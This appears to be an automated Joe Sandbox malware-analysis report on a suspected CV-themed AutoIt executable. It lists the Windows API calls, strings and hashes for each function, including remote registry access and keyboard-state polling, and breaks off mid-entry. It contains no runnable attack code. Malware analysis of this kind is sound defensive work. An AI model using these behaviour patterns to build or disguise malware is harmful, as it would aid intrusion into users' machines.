                                                                                        • Opcode ID: 3a050cfbc38eb550b08cc3984574dcea4139ce76319af220b4360d5e353adfe9
                                                                                        • Instruction ID: 239dbf1b9a38756d2eb5ce6c2ed4cbd086bef9da5f63f307be6cc66591c371d7
                                                                                        • Opcode Fuzzy Hash: 3a050cfbc38eb550b08cc3984574dcea4139ce76319af220b4360d5e353adfe9
                                                                                        • Instruction Fuzzy Hash: 18515071800609AACF16FBE0CD46FEEB778AF09345F1001A6F505B60A2EB756E59DB60
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-3420473620
                                                                                        • Opcode ID: 3eb1b69264ab00373aea0362e2d59ff9a7fdb6d02fcc28585f2b589bbf6c60e2
                                                                                        • Instruction ID: 781da58b5713f7d2124bfe1e75eebf69dec4b5130de62323a6976a5c6c96d960
                                                                                        • Opcode Fuzzy Hash: 3eb1b69264ab00373aea0362e2d59ff9a7fdb6d02fcc28585f2b589bbf6c60e2
                                                                                        • Instruction Fuzzy Hash: 43519171800609AACF16FBE0CD46FEEB778AF04340F1040A6F505760A2EB756F59DB60
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: $EC$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-417088306
                                                                                        • Opcode ID: dc159446fbe14e9b93df70b558f9b75abbc0a5b42ffdd0b9513c08127d355b4a
                                                                                        • Instruction ID: 73f5238fee6485d18f635ef9281e25dd78e2e4d8b63898b70ed4191890a690ba
                                                                                        • Opcode Fuzzy Hash: dc159446fbe14e9b93df70b558f9b75abbc0a5b42ffdd0b9513c08127d355b4a
                                                                                        • Instruction Fuzzy Hash: 42417E3010029A9BCF02EF11DC45AEB3365BF56300F115955EC955B3A2EB74EE0ACB10
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C55D7
                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003C5664
                                                                                        • GetMenuItemCount.USER32(00441708), ref: 003C56ED
                                                                                        • DeleteMenu.USER32(00441708,00000005,00000000,000000F5,?,?), ref: 003C577D
                                                                                        • DeleteMenu.USER32(00441708,00000004,00000000), ref: 003C5785
                                                                                        • DeleteMenu.USER32(00441708,00000006,00000000), ref: 003C578D
                                                                                        • DeleteMenu.USER32(00441708,00000003,00000000), ref: 003C5795
                                                                                        • GetMenuItemCount.USER32(00441708), ref: 003C579D
                                                                                        • SetMenuItemInfoW.USER32(00441708,00000004,00000000,00000030), ref: 003C57D3
                                                                                        • GetCursorPos.USER32(?), ref: 003C57DD
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 003C57E6
                                                                                        • TrackPopupMenuEx.USER32(00441708,00000000,?,00000000,00000000,00000000), ref: 003C57F9
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003C5805
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3993528054-0
                                                                                        • Opcode ID: d26e7f711a99de82be6f176ae1a58fcdabc40ab0fcdc7bd09808a531bbf4d847
                                                                                        • Instruction ID: 39f2f722622d6904ff52a650684e34060f29eb7063bfbd1cdbc1b7a7cbfedb23
                                                                                        • Opcode Fuzzy Hash: d26e7f711a99de82be6f176ae1a58fcdabc40ab0fcdc7bd09808a531bbf4d847
                                                                                        • Instruction Fuzzy Hash: C771F470641605BFEB229B54CC49FAABF69FF00368F244219F519EA1E1C7717CA0DB94
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003BA1DC
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003BA211
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003BA22D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003BA249
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003BA273
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 003BA29B
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003BA2A6
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003BA2AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 1687751970-22481851
                                                                                        • Opcode ID: e022d4e4d12e6512c7e822713c4424e43fee987d2c5c73dfe6baed353d3fb042
                                                                                        • Instruction ID: 9550b1e5161bc7993a75c5f4ed434f72991cd338047d8a453d1a80a97d8ad36b
                                                                                        • Opcode Fuzzy Hash: e022d4e4d12e6512c7e822713c4424e43fee987d2c5c73dfe6baed353d3fb042
                                                                                        • Instruction Fuzzy Hash: 5E41F576C10629ABDF16EFA4DC85DEDB7B8BF08304F004569F901BB1A0EA749E05CB50
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 003C67FD
                                                                                        • __swprintf.LIBCMT ref: 003C680A
                                                                                          • Part of subcall function 003A172B: __woutput_l.LIBCMT ref: 003A1784
                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 003C6834
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 003C6840
                                                                                        • LockResource.KERNEL32(00000000), ref: 003C684D
                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 003C686D
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 003C687F
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 003C688E
                                                                                        • LockResource.KERNEL32(?), ref: 003C689A
                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003C68F9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                        • String ID: 5C
                                                                                        • API String ID: 1433390588-2849326592
                                                                                        • Opcode ID: d4345d51f99d74d84f89547983b12520c9278fa35ec47df62d701e0cf25a49a7
                                                                                        • Instruction ID: a1d748839cc9a033638400410860979c5032c4e300a00a3dc588d0e1d0b58b55
                                                                                        • Opcode Fuzzy Hash: d4345d51f99d74d84f89547983b12520c9278fa35ec47df62d701e0cf25a49a7
                                                                                        • Instruction Fuzzy Hash: 93317E7590021ABBDB129FA0DD46EBF7BA8EF09341F008429F902E6150E774DD55DBA4
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003F36F4,00000010,?,Bad directive syntax error,0041DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003C25D6
                                                                                        • LoadStringW.USER32(00000000,?,003F36F4,00000010), ref: 003C25DD
                                                                                        • _wprintf.LIBCMT ref: 003C2610
                                                                                        • __swprintf.LIBCMT ref: 003C2632
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003C26A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 1080873982-4153970271
                                                                                        • Opcode ID: c2784663fa9cb3c186a14bdc8666e3b8ae1ddc1173d682f5cad224332bef0904
                                                                                        • Instruction ID: 34ee681a2fd0d7e2ef536d6221ade0aa912183fbff171e2dbbba3a61967b2add
                                                                                        • Opcode Fuzzy Hash: c2784663fa9cb3c186a14bdc8666e3b8ae1ddc1173d682f5cad224332bef0904
                                                                                        • Instruction Fuzzy Hash: BB212F31900319AFCF12BF90CC4AFEE7B79BF19304F044496F5156A0A2DA75AA68DB64
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003C7B42
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003C7B58
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003C7B69
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003C7B7B
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003C7B8C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 890592661-1007645807
                                                                                        • Opcode ID: b432651fd4ee1e0d99e3ab1be91eeb1252ac9cea09bfb17589b87d303b09c352
                                                                                        • Instruction ID: 2e61513dda91851e09cbadd633f181d797d6b839f559b9df5cd80132909adc9f
                                                                                        • Opcode Fuzzy Hash: b432651fd4ee1e0d99e3ab1be91eeb1252ac9cea09bfb17589b87d303b09c352
                                                                                        • Instruction Fuzzy Hash: 4E11C4A1A5025979D721BB61CC4AEFFBA7CEBD5B01F10045A7811AB0C1DB741E48CBB0
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 003C7794
                                                                                          • Part of subcall function 0039DC38: timeGetTime.WINMM(?,75C0B400,003F58AB), ref: 0039DC3C
                                                                                        • Sleep.KERNEL32(0000000A), ref: 003C77C0
                                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003C77E4
                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 003C7806
                                                                                        • SetActiveWindow.USER32 ref: 003C7825
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003C7833
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 003C7852
                                                                                        • Sleep.KERNEL32(000000FA), ref: 003C785D
                                                                                        • IsWindow.USER32 ref: 003C7869
                                                                                        • EndDialog.USER32(00000000), ref: 003C787A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        • Opcode ID: 18c6623009c2283ec5ff6e391cc3d6272020cc34cb854b9fa8bbc15b54c17ad9
                                                                                        • Instruction ID: d9d2a134cda95cc50e73d41cc33d9d55762f28a181f2593ead2f5aa344459116
                                                                                        • Opcode Fuzzy Hash: 18c6623009c2283ec5ff6e391cc3d6272020cc34cb854b9fa8bbc15b54c17ad9
                                                                                        • Instruction Fuzzy Hash: 2E213B75604209AFE7065FA0ED8AF263F79FB45B4AB000438FD06E6162CB719D18DF28
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • CoInitialize.OLE32(00000000), ref: 003D034B
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003D03DE
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 003D03F2
                                                                                        • CoCreateInstance.OLE32(0040DA8C,00000000,00000001,00433CF8,?), ref: 003D043E
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003D04AD
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 003D0505
                                                                                        • _memset.LIBCMT ref: 003D0542
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 003D057E
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003D05A1
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 003D05A8
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003D05DF
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 003D05E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: 4b4be3292fea21d3a3ab4c15d96ff04a8104175917f3ace6690490bd2ccbf934
                                                                                        • Instruction ID: 97c07ba5714c62284b16fd0f48a9c689f9c192ae4ec57ba9f741663c70997a7c
                                                                                        • Opcode Fuzzy Hash: 4b4be3292fea21d3a3ab4c15d96ff04a8104175917f3ace6690490bd2ccbf934
                                                                                        • Instruction Fuzzy Hash: 8DB1D975A00208AFDB05EFA4D888EAEBBB9EF49704F1484A9E815EB251D770ED45CB50
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 003C2ED6
                                                                                        • SetKeyboardState.USER32(?), ref: 003C2F41
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 003C2F61
                                                                                        • GetKeyState.USER32(000000A0), ref: 003C2F78
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 003C2FA7
                                                                                        • GetKeyState.USER32(000000A1), ref: 003C2FB8
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 003C2FE4
                                                                                        • GetKeyState.USER32(00000011), ref: 003C2FF2
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 003C301B
                                                                                        • GetKeyState.USER32(00000012), ref: 003C3029
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 003C3052
                                                                                        • GetKeyState.USER32(0000005B), ref: 003C3060
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 6a7477d6041e78fbf411e5ccaef94daa65012952f3e19748d75908fa34f24160
                                                                                        • Instruction ID: 2a31b7026166159fc8a8d6a93166bb2a269d4f76e94c04b3f30ae9b3cc3d18ad
                                                                                        • Opcode Fuzzy Hash: 6a7477d6041e78fbf411e5ccaef94daa65012952f3e19748d75908fa34f24160
                                                                                        • Instruction Fuzzy Hash: 2F51E62590479829FB37EBB48810FEABFF49F11340F09859DD5C29A1C2DA549F8CC7A6
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 003BED1E
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003BED30
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003BED8E
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 003BED99
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003BEDAB
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003BEE01
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 003BEE0F
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003BEE20
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003BEE63
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 003BEE71
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003BEE8E
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 003BEE9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: bf205e8f37c3c66277e7845ee331012de81783befa173610d6fdefb9818c60ee
                                                                                        • Instruction ID: 14c1dd1e9eb53e3d7b22ed232f53e9c3764d05da68a8b95c39a4fa82bce134d0
                                                                                        • Opcode Fuzzy Hash: bf205e8f37c3c66277e7845ee331012de81783befa173610d6fdefb9818c60ee
                                                                                        • Instruction Fuzzy Hash: B8512F71B00205AFDB18CFACCD85AAEBBBAEB88304F15852DF619E7290D771DD048B14
                                                                                        APIs
                                                                                          • Part of subcall function 0039B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0039B759,?,00000000,?,?,?,?,0039B72B,00000000,?), ref: 0039BA58
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0039B72B), ref: 0039B7F6
                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0039B72B,00000000,?,?,0039B2EF,?,?), ref: 0039B88D
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 003FD8A6
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0039B72B,00000000,?,?,0039B2EF,?,?), ref: 003FD8D7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0039B72B,00000000,?,?,0039B2EF,?,?), ref: 003FD8EE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0039B72B,00000000,?,?,0039B2EF,?,?), ref: 003FD90A
                                                                                        • DeleteObject.GDI32(00000000), ref: 003FD91C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        • Opcode ID: 8e00181432d562068813d3eb2808cb2a4646885a708e3de2d075903e31d275ad
                                                                                        • Instruction ID: 0a4363cb240fab6d63ff67376cbd68dd997dd3af2561e1dd582d05fa2ae0298a
                                                                                        • Opcode Fuzzy Hash: 8e00181432d562068813d3eb2808cb2a4646885a708e3de2d075903e31d275ad
                                                                                        • Instruction Fuzzy Hash: 6561AD30501604DFDF279F94EA88B36B7FAFF85311F16462DE5869AA70C770A880CB48
                                                                                        APIs
                                                                                          • Part of subcall function 0039B526: GetWindowLongW.USER32(?,000000EB), ref: 0039B537
                                                                                        • GetSysColor.USER32(0000000F), ref: 0039B438
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        • Opcode ID: 2eb821d0fb6984563071f09c506f43a9ba2a7880441ae33614118078c0075c50
                                                                                        • Instruction ID: 14f7685c5a4231dffc3a2321e9207799bf131a1cdac585321c1155a8faeec35c
